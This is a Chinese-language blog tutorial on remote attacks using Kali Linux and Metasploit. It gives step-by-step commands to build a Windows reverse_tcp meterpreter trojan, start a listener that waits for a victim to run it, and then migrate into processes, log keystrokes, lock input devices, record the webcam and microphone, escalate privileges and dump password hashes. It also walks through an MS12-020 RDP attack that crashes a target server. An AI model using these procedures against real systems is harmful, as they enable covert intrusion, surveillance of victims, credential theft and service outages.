kali linux 遠程攻擊
Metasploit
1啟動:msfconsole
exploit 漏洞利用工具
payloads ----àshellcode 漏洞利用後執行的代碼
木馬 控制 服務器
遠程控制 木馬程序
2.根據自己的ip生成一個木馬
msfpayload windows/meterpreter/reverse_tcp LHOST=linux的ip LPORT=55555 X > test.exe
windows/meterpreter/reverse_tcp 目錄
LHOST 本地的IP
LPORT 端口 (高端口容易過防火墻)
X 二進制 > 寫 test.exe 二進制文件(木馬程序)
主文件夾下
3.
use exploit/multi/handler
使用handler這個模塊
4.使用show options 查看參數(發現無參數)
.
5.直接選下一個 set PAYLOAD windows/meterpreter/reverse_tcp
reverse_tcp 反向的鏈接(使用 shellcold 程序)
6.此時再次查看參數 show options
LHOST = 生成木馬的linux IP 地址 (均要填寫)
LPORT = 高端口 55555
7.填寫生成木馬的ip 以及端口
set LHOST linux IP
set LPORT 55555
生成完後,再次查看是否填寫 show options
8.執行 exploit (等待鏈接狀態)
等待點擊木馬
Metasploit(工具使用)
background 將會話放入後臺
sessions -l 查看後臺的會話
sessions -i 1 切換回剛才的會話
註入進程(防止木馬被關閉)
ps 得到想要的PID進程
migrate PID 註入
(216 184 explorer.exe 桌面管理進程)
migrate 216 註入
(查看進程 PS)
例如 meterpreter> run vnc 開啟遠程桌面
文件管理功能 (file system commands)
download
edit (編輯文件) 後面直接加文件名
cat(查看文件)
mkdir (創建文件夾)
mv (移動文件)
rm (刪除文件)
upload (上傳)
rmdir (刪除文件夾)
網絡和系統操作 Networking commands
arp (查看arp緩存表)
getproxy (獲取本機的代理)
ifconfig
ipconfig
netstat (查看本機的端口鏈接)
系統操作
kill 結束進程 (後面直接跟進程的PID號)
ps 查看進程
reboot 重啟
reg 修改註冊表
shell 獲取終端
shutdown 關機
sysinfo 獲取電腦信息
用戶和其余操作 user interface commands
enumdesktops 用戶登錄數
keyscan_dump 鍵盤記錄_下載
keyscan_start 鍵盤記錄_開始
keyscan_stop 鍵盤記錄_停止
uictl 獲得鍵盤鼠標控制權
攝像頭操作
record_mic 音頻錄制
webcam_chat 查看攝像頭接口
webcam_list 查看攝像頭列表
webcam_stream 攝像頭視頻錄制
getsystem 獲取高權限
hashdump 下載管理員的哈希密文
鍵盤記錄的用法
1).先keyscan_start 開始記錄
2). 再次 keyscan_dump 下載查看記錄
3). Keyscan_stop 停止監聽
鍵盤鼠標的鎖定
uictl -h 查看參數
enable(打開) disable(鎖定) keyboard(鍵盤) mouse(鼠標)
例:uictl disable keyboard 鎖定鍵盤
註:鍵盤鎖定時,win+E 任然可以用
音頻錄制:先查看參數在錄制
Metasploit—(服務器藍屏攻擊)
條件:服務器必須開啟 3389 端口( netstat –an 可進行查看)
目標:(DDOS 攻擊)192.168.X.X
漏洞名稱:MS12—020
1啟動:msfconsole
2.輸入 search ms12-020
解釋:
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
服務器遠程桌面的模塊
auxiliary/scanner/rdp/ms12_020_check
查看是否存在該漏洞
3. 檢查 use auxiliary/scanner/rdp/ms12_020_check
(查看參數 show options)
RHOSTS 以R開頭為遠程主機
4.set RHOSTS 服務器的IP
5. 查看該端口是否存在 exploit
6.換模塊 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
7.查看參數 show options
寫入IP : set RHOST 服務器IP 再次查看是否設置成功
8.重新開一個終端,用ping (服務器) :正常應為ping通
(在網站的搜索欄,進入看是否能進入:輸入服務器的IP)
9. 輸入 exploit 攻擊開始
結果:服務器藍屏,無法ping 通
開啟:3389:
http://blog.csdn.net/bekilledlzy/article/details/1817637
Ms12-020解決措施
http://cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm
註:
如果對方開啟了防火墻或者修改了3389端口,可以通過下面方式查看:有一個 XXXX/tcp open realserver (可疑)
端口講解
http://vip.2cto.com/jc/241.html
本文出自 “10883981” 博客,轉載請與作者聯系!
kali linux 遠程攻擊